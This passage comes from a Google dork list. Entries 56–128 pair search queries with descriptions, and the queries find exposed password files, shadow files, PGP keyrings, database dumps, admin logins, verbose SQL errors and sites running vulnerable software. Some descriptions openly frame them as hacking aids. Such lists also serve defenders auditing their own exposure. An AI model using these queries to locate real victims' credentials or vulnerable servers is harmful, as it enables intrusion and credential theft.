Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Aadmin+intitle%3Alogin[url]] [[dork]intitle:admin intitle:login[dork]] [end][56]] [[start][57] [[title]ORA-00921: unexpected end of SQL command[[title]] [[descr]Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22ORA-00921%3A+unexpected+end+of+SQL+command%22[url]] [[dork]"ORA-00921: unexpected end of SQL command"[dork]] [end][57]] [[start][58] [[title]passlist.txt (a better way)[[title]] [[descr]Cleartext passwords. No decryption required![descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Apasslist.txt[url]] [[dork]inurl:passlist.txt[dork]] [end][58]] [[start][59] [[title]sitebuildercontent[[title]] [[descr]This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder directory names, I wonder what else they got wrong?[descr]] [[url]http://www.google.com/search?q=inurl:sitebuildercontent&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N[url]] [[dork]inurl:sitebuildercontent[dork]] [end][59]] [[start][60] [[title]sitebuilderfiles[[title]] [[descr]This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder directory names, I wonder what else they got wrong?[descr]] [[url]http://www.google.com/search?q=inurl:sitebuilderfiles&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N[url]] [[dork]inurl:sitebuilderfiles[dork]] [end][60]] [[start][61] [[title]sitebuilderpictures[[title]] [[descr]This is a default directory for the sitebuilder web design software program. 
If these people posted web pages with default sitebuilder directory names, I wonder what else they got wrong?[descr]] [[url]http://www.google.com/search?q=inurl:sitebuilderpictures&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N[url]] [[dork]inurl:sitebuilderpictures[dork]] [end][61]] [[start][62] [[title]htpasswd[[title]] [[descr]This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtpasswd+htpasswd[url]] [[dork]filetype:htpasswd htpasswd[dork]] [end][62]] [[start][63] [[title]"YaBB SE Dev Team"[title]] [[descr]Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contains an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674 for more information. Also see http://www.securityfocus.com/bid/9677 for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22YaBB+SE+Dev+Team%22[url]] [[dork]"YaBB SE Dev Team"[dork]] [end][63]] 
[[start][64] [[title]EarlyImpact Productcart[[title]] [[descr]The EarlyImpact Productcart contains multiple vulnerabilities, which could be exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more information. Also see http://www.securityfocus.com/bid/9677 for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3ACustva.asp+[url]] [[dork]inurl:Custva.asp [dork]] [end][64]] [[start][65] [[title]mnoGoSearch vulnerability[[title]] [[descr]According to http://www.securityfocus.com/bid/9667, certain versions of mnoGoSearch contain a buffer overflow vulnerability which allows an attacker to execute commands on the server. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Powered+by+mnoGoSearch+-+free+web+search+engine+software%22[url]] [[dork]"Powered by mnoGoSearch - free web search engine software"[dork]] [end][65]] [[start][66] [[title]IIS 4.0 error messages[[title]] [[descr]IIS 4.0 servers. Extremely old, incredibly easy to hack...
[descr]] [[url]http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+inetmgr[url]] [[dork]intitle:"the page cannot be found" inetmgr[dork]] [end][66]] [[start][67] [[title]Windows 2000 web server error messages[[title]] [[descr]Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box...
[descr]] [[url]http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%222004+microsoft+corporation%22[url]] [[dork]intitle:"the page cannot be found" "2004 microsoft corporation"[dork]] [end][67]] [[start][68] [[title]IIS web server error messages[[title]] [[descr]This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into...
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%22internet+information+services%22[url]] [[dork]intitle:"the page cannot be found" "internet information services"[dork]] [end][68]] [[start][69] [[title]phpMyAdmin dumps[[title]] [[descr]From phpmyadmin.net: "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but don't leave your database dumps lying around on the web. They contain all SORTS of sensitive information... [descr]] [[url]http://www.google.com/search?&q=%22%23+phpMyAdmin+MySQL%2DDump%22+filetype%3Atxt[url]] [[dork]"# phpMyAdmin MySQL-Dump" filetype:txt[dork]] [end][69]] [[start][70] [[title]phpMyAdmin dumps[[title]] [[descr]From phpmyadmin.net: "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but don't leave your database dumps lying around on the web. They contain all SORTS of sensitive information... [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&q=%22%23+phpMyAdmin+MySQL-Dump%22+%22INSERT+INTO%22+-%22the%22[url]] [[dork]"# phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"[dork]] [end][70]] [[start][71] [[title]Gallery in configuration mode[[title]] [[descr]Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that![descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gallery+in+Configuration+mode%22[url]] [[dork]intitle:"Gallery in Configuration mode"[dork]] [end][71]] [[start][72] [[title]cgiirc.conf[[title]] [[descr]CGIIRC is a web-based IRC client. Very cool stuff. 
The cgiirc.config file lists the options for this program, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!
[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+cgiirc%2Econfig%27[url]] [[dork]intitle:index.of cgiirc.config'[dork]] [end][72]] [[start][73] [[title]cgiirc.conf[[title]] [[descr]This is another, less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this program, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%27cgiirc.config%27[url]] [[dork]inurl:'cgiirc.config'[dork]] [end][73]] [[start][74] [[title]ipsec.secrets[[title]] [[descr]From the manpage for ipsec_secrets: "It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others." So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+-history+-bugs[url]] [[dork]inurl:ipsec.secrets -history -bugs[dork]] [end][74]] [[start][75] [[title]ipsec.secrets[[title]] [[descr]From the manpage for ipsec_secrets: "It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others." So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+%22holds+shared+secrets%22[url]] [[dork]inurl:ipsec.secrets "holds shared secrets"[dork]] [end][75]] [[start][76] [[title]ipsec.conf[[title]] [[descr]The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting....

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.conf+-intitle%3Amanpage[url]] [[dork]inurl:ipsec.conf -intitle:manpage[dork]] [end][76]] [[start][77] [[title]Internal Server Error[[title]] [[descr]This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22500+Internal+Server+Error%22+%22server+at%22[url]] [[dork]intitle:"500 Internal Server Error" "server at"[dork]] [end][77]] [[start][78] [[title]mysql error with query[[title]] [[descr]Another error message; this one appears when an SQL query bails. This is a generic mySQL message, so there's all sorts of information hackers can use, depending on the actual error message...
[descr]] [[url]http://www.google.com/search?q=%22mySQL+error+with+query%22[url]] [[dork]"mySQL error with query"[dork]] [end][78]] [[start][79] [[title]SQL syntax error[[title]] [[descr]Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22You+have+an+error+in+your+SQL+syntax+near%22[url]] [[dork]"You have an error in your SQL syntax near"[dork]] [end][79]] [[start][80] [[title]ORA-00936: missing expression[[title]] [[descr]A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00936%3A+missing+expression%22[url]] [[dork]"ORA-00936: missing expression"[dork]] [end][80]] [[start][81] [[title]"Supplied argument is not a valid MySQL result resource"[title]] [[descr]Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?q=%22Supplied+argument+is+not+a+valid+MySQL+result+resource%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N[url]] [[dork]"Supplied argument is not a valid MySQL result resource"[dork]] [end][81]] [[start][82] [[title]ORA-00921: unexpected end of SQL command[[title]] [[descr]Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00921%3A+unexpected+end+of+SQL+command%22[url]] [[dork]"ORA-00921: unexpected end of SQL command"[dork]] [end][82]] [[start][83] [[title]"ORA-00933: SQL command not properly ended"[title]] [[descr]An Oracle error message, this message can display path names, function 
names, filenames and partial SQL code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ORA-00933%3A+SQL+command+not+properly+ended%22[url]] [[dork]"ORA-00933: SQL command not properly ended"[dork]] [end][83]] [[start][84] [[title]"Unclosed quotation mark before the character string"[title]] [[descr]An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?q=%22Unclosed+quotation+mark+before+the+character+string%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N[url]] [[dork]"Unclosed quotation mark before the character string"[dork]] [end][84]] [[start][85] [[title]"Incorrect syntax near"[title]] [[descr]An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?q=%22Incorrect+syntax+near%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N[url]] [[dork]"Incorrect syntax near"[dork]] [end][85]] [[start][86] [[title]"Incorrect syntax near"[title]] [[descr]An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Incorrect+syntax+near%22+-the[url]] [[dork]"Incorrect syntax near" -the[dork]] [end][86]] [[start][87] [[title]"PostgreSQL query failed: ERROR: parser: parse error"[title]] [[descr]A PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22PostgreSQL+query+failed%3A++ERROR%3A++parser%3A+parse+error%22[url]] [[dork]"PostgreSQL query failed: ERROR: parser: parse error"[dork]] [end][87]] 
[[start][88] [[title]Supplied argument is not a valid PostgreSQL result[[title]] [[descr]A PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Supplied+argument+is+not+a+valid+PostgreSQL+result%22[url]] [[dork]"Supplied argument is not a valid PostgreSQL result"[dork]] [end][88]] [[start][89] [[title]"Syntax error in query expression " -the[[title]] [[descr]An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?q=%22Syntax+error+in+query+expression+%22+-the&hl=en&lr=&ie=UTF-8&oe=UTF-8[url]] [[dork]"Syntax error in query expression " -the[dork]] [end][89]] [[start][90] [[title]"An illegal character has been found in the statement" -"previous message"[title]] [[descr]An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22An+illegal+character+has+been+found+in+the+statement%22+-%22previous+message%22[url]] [[dork]"An illegal character has been found in the statement" -"previous message"[dork]] [end][90]] [[start][91] [[title]"A syntax error has occurred" filetype:ihtml[[title]] [[descr]An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22A+syntax+error+has+occurred%22+filetype%3Aihtml[url]] [[dork]"A syntax error has occurred" filetype:ihtml[dork]] [end][91]] [[start][92] [[title]"detected an internal error [IBM][CLI Driver][DB2/6000]"[title]] [[descr]A DB2 error message, this message can display path names, function 
names, filenames, partial code and program state, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22detected+an+internal+error+%5BIBM%5D%5BCLI+Driver%5D%5BDB2%2F6000%5D%22[url]] [[dork]"detected an internal error [IBM][CLI Driver][DB2/6000]"[dork]] [end][92]] [[start][93] [[title]An unexpected token "END-OF-STATEMENT" was found[[title]] [[descr]A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=An+unexpected+token+%22END-OF-STATEMENT%22+was+found[url]] [[dork]An unexpected token "END-OF-STATEMENT" was found[dork]] [end][93]] [[start][94] [[title]intitle:"statistics of" "advanced web statistics"[title]] [[descr]The awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more, which can provide very interesting recon information for an attacker.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22statistics+of%22+%22advanced+web+statistics%22[url]] [[dork]intitle:"statistics of" "advanced web statistics"[dork]] [end][94]] [[start][95] [[title]intitle:"Usage Statistics for" "Generated by Webalizer"[title]] [[descr]The webalizer program shows web statistics for web servers. 
This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Usage+Statistics+for%22+%22Generated+by+Webalizer%22[url]] [[dork]intitle:"Usage Statistics for" "Generated by Webalizer"[dork]] [end][95]] [[start][96] [[title]"robots.txt" "Disallow:" filetype:txt[[title]] [[descr]The robots.txt file serves as a set of instructions for web crawlers. The "disallow" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22robots%2Etxt%22+%2B+%22Disallow%3A%22+filetype%3Atxt[url]] [[dork]"robots.txt" + "Disallow:" filetype:txt[dork]] [end][96]] [[start][98] [[title]"phpMyAdmin" "running on" inurl:"main.php"[title]] [[descr]From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=%22phpMyAdmin%22+%22running+on%22+inurl%3A%22main.php%22&btnG=Google+Search[url]] [[dork]"phpMyAdmin" "running on" inurl:"main.php"[dork]] [end][98]] [[start][99] [[title]inurl:main.php phpMyAdmin[[title]] [[descr]From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+phpMyAdmin[url]] [[dork]inurl:main.php phpMyAdmin[dork]] [end][99]] [[start][100] [[title]inurl:main.php Welcome to phpMyAdmin[[title]] [[descr]From phpmyadmin.net : "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW." Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+Welcome+to+phpMyAdmin[url]] [[dork]inurl:main.php Welcome to phpMyAdmin[dork]] [end][100]] [[start][101] [[title]"Warning: Cannot modify header information - headers already sent"[title]] [[descr]A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Warning%3A+Cannot+modify+header+information+%2D+headers+already+sent%22[url]] [[dork]"Warning: Cannot modify header information - headers already sent"[dork]] [end][101]] [[start][102] [[title]intitle:"wbem" compaq login "Compaq Information Technologies Group"[title]] [[descr]These devices are running HP Insight Management Agents for Servers which
"provide device information for all managed subsystems. Alerts are generated by SNMP traps." The information on these pages include server addresses and other assorted SNMP information.
[descr]] [[url]http://www.google.com/search?q=intitle:%22wbem%22+compaq+login+%22Compaq+Information+Technologies+Group%22&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"wbem" compaq login "Compaq Information Technologies Group"[dork]] [end][102]] [[start][103] [[title]intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com[[title]] [[descr]This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache.[descr]] [[url]http://www.google.com/search?q=intitle:osCommerce+inurl:admin+intext:%22redistributable+under+the+GNU%22intext:%22Online+Catalog%22+-demo+-site:oscommerce.com[url]] [[dork]intitle:osCommerce inurl:admin intext:"redistributable under the GNU"intext:"Online Catalog" -demo -site:oscommerce.com[dork]] [end][103]] [[start][104] [[title]intitle:index.of "Apache" "server at"[title]] [[descr]This is a very basic string found on directory listing pages which show the version of the Apache web server. 
Hackers can use this information to find vulnerable targets without querying the servers.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+%22Apache%22+%22server+at%22[url]] [[dork]intitle:index.of "Apache" "server at"[dork]] [end][104]] [[start][105] [[title]"access denied for user" "using password"[title]] [[descr]Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22access+denied+for+user%22+%22using+password%22[url]] [[dork]"access denied for user" "using password"[dork]] [end][105]] [[start][106] [[title]intitle:"Under construction" "does not currently have"[title]] [[descr]This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Under+construction%22+%22does+not+currently+have%22[url]] [[dork]intitle:"Under construction" "does not currently have"[dork]] [end][106]] [[start][107] [[title]"seeing this instead" intitle:"test page for apache"[title]] [[descr]This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22seeing+this+instead%22+intitle%3A%22test+page+for+apache%22[url]] [[dork]"seeing this instead" intitle:"test page for apache"[dork]] [end][107]] [[start][108] [[title]intitle:"Test Page for Apache" "It Worked!"[title]] [[descr]This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. 
In addition, this indicates that the web server is not well maintained.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22[url]] [[dork]intitle:"Test Page for Apache" "It Worked!"[dork]] [end][108]] [[start][109] [[title]intitle:"Test Page for Apache" "It Worked!" "on this web"[title]] [[descr]This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22+%22on+this+web%22[url]] [[dork]intitle:"Test Page for Apache" "It Worked!" "on this web"[dork]] [end][109]] [[start][110] [[title]"Can't connect to local" intitle:warning[[title]] [[descr]Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers...[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Can%27t+connect+to+local%22+intitle%3Awarning[url]] [[dork]"Can't connect to local" intitle:warning[dork]] [end][110]] [[start][111] [[title]intitle:index.of dead.letter[[title]] [[descr]dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+dead.letter[url]] [[dork]intitle:index.of dead.letter[dork]] [end][111]] [[start][112] [[title]intitle:index.of ws_ftp.ini[[title]] [[descr]ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. 
These should not be on the web![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+ws_ftp.ini[url]] [[dork]intitle:index.of ws_ftp.ini[dork]] [end][112]] [[start][113] [[title]intitle:index.of administrators.pwd[[title]] [[descr]This file contains administrative user names and (weakly) encrypted passwords for Microsoft Front Page. The file should not be readable to the general public.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+administrators.pwd[url]] [[dork]intitle:index.of administrators.pwd[dork]] [end][113]] [[start][114] [[title]inurl:secring ext:skr | ext:pgp | ext:bak[[title]] [[descr]This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web![descr]] [[url]http://www.google.com/search?q=inurl:secring+ext:skr+%7C+ext:pgp+%7C+ext:bak[url]] [[dork]inurl:secring ext:skr | ext:pgp | ext:bak[dork]] [end][114]] [[start][115] [[title]intitle:Index.of etc shadow[[title]] [[descr]This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3AIndex.of+etc+shadow[url]] [[dork]intitle:Index.of etc shadow[dork]] [end][115]] [[start][116] [[title]inurl:ManyServers.htm[[title]] [[descr]Microsoft Terminal Services Multiple Clients pages. 
These pages are not necessarily insecure, since many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Amanyservers.htm[url]] [[dork]inurl:manyservers.htm[dork]] [end][116]] [[start][117] [[title]intitle:"Terminal Services Web Connection"[title]] [[descr]Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, since many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst-case scenario, these pages may allow an attacker to bypass a firewall, gaining access to a "protected" machine.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Terminal+Services+Web+Connection%22[url]] [[dork]intitle:"Terminal Services Web Connection"[dork]] [end][117]] [[start][118] [[title]intitle:"Remote Desktop Web Connection"[title]] [[descr]Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, since many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. 
In the worst-case scenario, these pages may allow an attacker to bypass a firewall, gaining access to an otherwise inaccessible machine.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Remote+Desktop+Web+Connection%22[url]] [[dork]intitle:"Remote Desktop Web Connection"[dork]] [end][118]] [[start][119] [[title]"Welcome to Intranet"[title]] [[descr]According to whatis.com: "An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet." Intranets, by definition, should not be available to the Internet's unwashed masses as they may contain private corporate information.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Welcome+to+Intranet%22[url]] [[dork]"Welcome to Intranet"[dork]] [end][119]] [[start][120] [[title]inurl:search.php vbulletin[[title]] [[descr]Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656
for more info. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Asearch.php+vbulletin[url]] [[dork]inurl:search.php vbulletin[dork]] [end][120]] [[start][121] [[title]inurl:footer.inc.php[[title]] [[descr]From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, some allowing an attacker to execute malicious code on the web server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afooter.inc.php[url]] [[dork]inurl:footer.inc.php[dork]] [end][121]] [[start][122] [[title]inurl:info.inc.php[[title]] [[descr]From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, some allowing an attacker to execute malicious code on the web server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Ainfo.inc.php[url]] [[dork]inurl:info.inc.php[dork]] [end][122]] [[start][123] [[title]inurl:admin intitle:login[[title]] [[descr]This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+intitle%3Alogin[url]] [[dork]inurl:admin intitle:login[dork]] [end][123]] [[start][124] [[title]intitle:admin intitle:login[[title]] [[descr]This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. 
Further investigation of the surrounding directories can often reveal interesting information.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aadmin+intitle%3Alogin[url]] [[dork]intitle:admin intitle:login[dork]] [end][124]] [[start][125] [[title]filetype:asp "Custom Error Message" Category Source[[title]] [[descr]This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code.[descr]] [[url]http://www.google.com/search?q=filetype:asp+%22Custom+Error+Message%22+Category+Source&ie=UTF-8&oe=UTF-8[url]] [[dork]filetype:asp "Custom Error Message" Category Source[dork]] [end][125]] [[start][126] [[title]"Fatal error: Call to undefined function" -reply -the -next[[title]] [[descr]This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code.[descr]] [[url]http://www.google.com/search?q=%22Fatal+error:+Call+to+undefined+function%22+-reply+-the+-next&hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&start=10&sa=N[url]] [[dork]"Fatal error: Call to undefined function" -reply -the -next[dork]] [end][126]] [[start][127] [[title]inurl:admin filetype:xls[[title]] [[descr]This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information.[descr]] [[url]http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Axls&btnG=Google+Search[url]] [[dork]inurl:admin filetype:xls[dork]] [end][127]] [[start][128] [[title]inurl:admin inurl:userlist[[title]] [[descr]This search reveals userlists of administrative importance. 
